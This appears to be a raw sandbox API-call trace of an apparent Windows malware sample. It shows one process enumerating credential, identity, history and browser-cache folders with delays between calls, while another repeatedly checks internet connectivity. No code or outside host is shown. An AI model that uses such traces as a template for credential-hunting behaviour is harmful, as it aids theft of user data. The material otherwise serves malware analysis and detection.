| 07:44:00,055 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:00,135 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Credentials\S-1-5-20\*.* |
SUCCESS | 0x0016ce68 | |
| 07:44:00,135 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000190 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00\xd0\xa4dH\xd5I\xcd\x01\xd0\xa4dH\xd5I\xcd\x01\xd0\xa4dH\xd5I\xcd\x01\xd0\xa4dH\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:44:00,135 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000190 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:00,135 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:00,135 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:00,215 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\*.* |
SUCCESS | 0x00169d88 | |
| 07:44:00,215 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10\x88^H\xd5I\xcd\x01\x10J#(\xf2\x91\xcf\x01\x10\x88^H\xd5I\xcd\x01\x10\x88^H\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00\x10\x88^H\xd5I\xcd\x01\xf0\x1b\x13\xf7\xdf\x91\xcf\x01\xd0\xf1\x1a\xe1\xd5I\xcd\x01\xa0\xc7\xc7L\xd5I\xcd\x01\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00"\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00U\x00s\x00r\x00C\x00l\x00a\x00s\x00s\x00.\x00d\x00a\x00t\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x88^H\xd5I\xcd\x01\x90S\xefwX\x94\xcf\x01 \xe9\xf3wX\x94\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:00,215 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:00,215 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:00,215 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => |
FAILURE | 2147483654 | |
| 07:44:00,215 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:00,295 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\NetworkService\Local Settings\History\*.* |
SUCCESS | 0x0016e590 | |
| 07:44:00,295 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => h\x00\x00\x00\x00\x00\x00\x00@\x9cGH\xd5I\xcd\x01\xa0\xaaJH\xd5I\xcd\x01P\xac59oI\xcd\x01@%\xee0\xf2\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00ime=W.x\x00\x00\x00\x00\x00\x00\x00\xa0\xaaJH\xd5I\xcd\x01\xa0\xaaJH\xd5I\xcd\x01\xb0\xe8\xa49\xd5I\xcd\x01\xa0\xaaJH\xd5I\xcd\x01q\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00&\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x000\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00p#IH\xd5I\xcd\x01\xa0\xaaJH\xd5I\xcd\x01\x10\xf7\xa79\xd5I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:44:00,295 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:00,375 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\*.* |
SUCCESS | 0x00169d50 | |
| 07:44:00,375 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => h\x00\x00\x00\x00\x00\x00\x00p#IH\xd5I\xcd\x01\xa0\xaaJH\xd5I\xcd\x01\x10\xf7\xa79\xd5I\xcd\x01\xa0\xaaJH\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00O\xc2\x97\xeb \xda\x00\x00\x00\x00\x00\x00\x00\x00p#IH\xd5I\xcd\x01\xa0\xaaJH\xd5I\xcd\x01\x10\xf7\xa79\xd5I\xcd\x01\xa0\xaaJH\xd5I\xcd\x01q\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00&\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00 |
SUCCESS | 0x00000000 | |
| 07:44:00,375 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:00,375 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => |
FAILURE | 2147483654 | |
| 07:44:00,375 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:00,455 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\NetworkService\Local Settings\Temp\*.* |
SUCCESS | 0x0016e590 | |
| 07:44:00,455 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00\xa0\x1dcH\xd5I\xcd\x01\xa0\x1dcH\xd5I\xcd\x01\xa0\x1dcH\xd5I\xcd\x01\xa0\x1dcH\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:44:00,455 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => |
FAILURE | 2147483654 | |
| 07:44:00,455 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:00,535 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\*.* |
SUCCESS | 0x0016e590 | |
| 07:44:00,535 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10\x15FH\xd5I\xcd\x01\xa0\xaaJH\xd5I\xcd\x01 %49oI\xcd\x01@%\xee0\xf2\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00ime=W.x\x00\x00\x00\x00\x00\x00\x00\x10\x15FH\xd5I\xcd\x01\xa0\xaaJH\xd5I\xcd\x01\xe0o\xa69\xd5I\xcd\x01\xa0\xaaJH\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00C\x00o\x00n\x00t\x00e\x00n\x00t\x00.\x00I\x00E\x005\x000\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00p#IH\xd5I\xcd\x01\xa0\xaaJH\xd5I\xcd\x01\x80a\xa39\xd5I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:44:00,535 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:00,605 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:00,605 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:00,605 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:00,605 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:00,605 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:00,615 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\*.* |
SUCCESS | 0x00169d50 | |
| 07:44:00,615 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10\x15FH\xd5I\xcd\x01\xa0\xaaJH\xd5I\xcd\x01\xe0o\xa69\xd5I\xcd\x01\xa0\xaaJH\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00O\xc2\x97\xeb \xdap\x00\x00\x00\x00\x00\x00\x00@\x9cGH\xd5I\xcd\x01p#IH\xd5I\xcd\x01\xe0o\xa69\xd5I\xcd\x01\xa0\xaaJH\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x009\x003\x00D\x004\x00Q\x00A\x00H\x00i\x00x\x00\x00\x00\x00\x00\x00\x00p#IH\xd5I\xcd\x01\xa0\xaaJH\xd5I\xcd\x01\xb0\xe8\xa49\xd5I\xcd\x01\xa0\xaaJH\xd5I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:44:00,615 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:00,796 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\A93D4QAH\*.* |
SUCCESS | 0x00169d88 | |
| 07:44:00,796 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x00@\x9cGH\xd5I\xcd\x01p#IH\xd5I\xcd\x01\xe0o\xa69\xd5I\xcd\x01\xa0\xaaJH\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00p#IH\xd5I\xcd\x01p#IH\xd5I\xcd\x01\xe0o\xa69\xd5I\xcd\x01\xa0\xaaJH\xd5I\xcd\x01C\x00\x00\x00\x00\x00\x00\x00H\x00\x00\x00\x00\x00\x00\x00&\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00 |
SUCCESS | 0x00000000 | |
| 07:44:00,796 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:00,796 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:00,876 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\ILCLAAS6\*.* |
SUCCESS | 0x00169d88 | |
| 07:44:00,876 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x00@\x9cGH\xd5I\xcd\x01p#IH\xd5I\xcd\x01\xe0o\xa69\xd5I\xcd\x01\xa0\xaaJH\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00p#IH\xd5I\xcd\x01p#IH\xd5I\xcd\x01\xe0o\xa69\xd5I\xcd\x01\xa0\xaaJH\xd5I\xcd\x01C\x00\x00\x00\x00\x00\x00\x00H\x00\x00\x00\x00\x00\x00\x00&\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00 |
SUCCESS | 0x00000000 | |
| 07:44:00,876 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:00,876 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:00,956 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\WEXIGKLS\*.* |
SUCCESS | 0x00169d88 | |
| 07:44:00,956 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10\x15FH\xd5I\xcd\x01p#IH\xd5I\xcd\x01\xe0o\xa69\xd5I\xcd\x01\xa0\xaaJH\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00p#IH\xd5I\xcd\x01p#IH\xd5I\xcd\x01\xe0o\xa69\xd5I\xcd\x01\xa0\xaaJH\xd5I\xcd\x01C\x00\x00\x00\x00\x00\x00\x00H\x00\x00\x00\x00\x00\x00\x00&\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00 |
SUCCESS | 0x00000000 | |
| 07:44:00,956 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:00,956 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:01,036 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\YMYTYN4M\*.* |
SUCCESS | 0x00169d88 | |
| 07:44:01,036 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10\x15FH\xd5I\xcd\x01\xa0\xaaJH\xd5I\xcd\x01\xb0\xe8\xa49\xd5I\xcd\x01\xa0\xaaJH\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00p#IH\xd5I\xcd\x01\xa0\xaaJH\xd5I\xcd\x01\xb0\xe8\xa49\xd5I\xcd\x01\xa0\xaaJH\xd5I\xcd\x01C\x00\x00\x00\x00\x00\x00\x00H\x00\x00\x00\x00\x00\x00\x00&\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00 |
SUCCESS | 0x00000000 | |
| 07:44:01,036 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:01,036 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:01,036 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => |
FAILURE | 2147483654 | |
| 07:44:01,036 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:01,036 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:01,036 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:01,116 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\*.* |
SUCCESS | 0x0016e590 | |
| 07:44:01,116 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0\xc9P\xb9\xd5I\xcd\x01\xc0%\xb0rX\x94\xcf\x01\xf0\xaf\x81\xb9\xd5I\xcd\x01\xf0\xaf\x81\xb9\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00urn"ar\x80\x00\x00\x00\x00\x00\x00\x00p\x03]\xb9\xd5I\xcd\x01@\xd1$(\xf2\x91\xcf\x010\x9a@\xbc\xd5I\xcd\x010\x9a@\xbc\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x10\x00A\x00P\x00P\x00L\x00I\x00C\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00p\x00p\x00l\x00i\x00c\x00a\x00t\x00i\x00o\x00n\x00 \x00D\x00a\x00t\x00a\x00\x00\x00p\x00\x00\x00\x00\x00\x00\x00p\x03]\xb9\xd5I\xcd\x01\x00\xee*(\xf2\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:01,116 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:01,196 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Application Data\*.* |
SUCCESS | 0x00169d50 | |
| 07:44:01,196 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => h\x00\x00\x00\x00\x00\x00\x00p\x03]\xb9\xd5I\xcd\x01@\xd1$(\xf2\x91\xcf\x010\x9a@\xbc\xd5I\xcd\x010\x9a@\xbc\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00FF}MICx\x00\x00\x00\x00\x00\x00\x00\xf0<i\xb9\xd5I\xcd\x01\x9f\x9e~P\xaf\x91\xcf\x01\x90\x8f/9oI\xcd\x01 \xc4j\xb9\xd5I\xcd\x01>\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00&\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00 \x00D\x00x\x00\x00\x00\x00\x00\x00\x000\x9a@\xbc\xd5I\xcd\x010\x9a@\xbc\xd5I\xcd\x010\x9a@\xbc\xd5I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:44:01,196 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:01,276 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Application Data\Identities\*.* |
SUCCESS | 0x00169d88 | |
| 07:44:01,276 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => h\x00\x00\x00\x00\x00\x00\x000\x9a@\xbc\xd5I\xcd\x010\x9a@\xbc\xd5I\xcd\x010\x9a@\xbc\xd5I\xcd\x010\x9a@\xbc\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00ime=W.\x00\x00\x00\x00\x00\x00\x00\x000\x9a@\xbc\xd5I\xcd\x010\x9a@\xbc\xd5I\xcd\x010\x9a@\xbc\xd5I\xcd\x010\x9a@\xbc\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00L\x00\x00\x00\x00\x00\x00\x00\x10\x00{\x00D\x000\x00E\x000\x004\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00{\x00D\x000\x00E\x000\x004\x00B\x006\x009\x00-\x00B\x003\x00A\x006\x00-\x004\x00F\x001\x004\x00-\x00B\x001\x005\x00B\x00-\x00A\x00E\x00C\x002\x00 |
SUCCESS | 0x00000000 | |
| 07:44:01,276 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:01,356 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Application Data\Identities\{D0E04B69-B3A6-4F14-B15B-AEC22EEB6AC2}\*.* |
SUCCESS | 0x0016ce68 | |
| 07:44:01,356 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x000\x9a@\xbc\xd5I\xcd\x010\x9a@\xbc\xd5I\xcd\x010\x9a@\xbc\xd5I\xcd\x010\x9a@\xbc\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:44:01,356 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:01,356 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => |
FAILURE | 2147483654 | |
| 07:44:01,356 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:01,406 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:01,406 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:01,406 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:01,406 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:01,406 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:01,437 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\*.* |
SUCCESS | 0x00169d88 | |
| 07:44:01,437 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => h\x00\x00\x00\x00\x00\x00\x00p\x03]\xb9\xd5I\xcd\x01\xf0xY&\xe0\x91\xcf\x01\xf0xY&\xe0\x91\xcf\x01\xf0xY&\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00ime=W.x\x00\x00\x00\x00\x00\x00\x00\xf0\xaf\x81\xb9\xd5I\xcd\x01\xf0\xaf\x81\xb9\xd5I\xcd\x01\xf0\xaf\x81\xb9\xd5I\xcd\x01\xf0\xaf\x81\xb9\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x10\x00C\x00R\x00E\x00D\x00E\x00N\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00C\x00r\x00e\x00d\x00e\x00n\x00t\x00i\x00a\x00l\x00s\x003\x00A\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\xf3Q\xf3\xdf\x91\xcf\x01\x00\xf3Q\xf3\xdf\x91\xcf\x01\x00\xf3Q\xf3\xdf\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:01,437 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:01,517 | 504 | FindFirstFileExW |
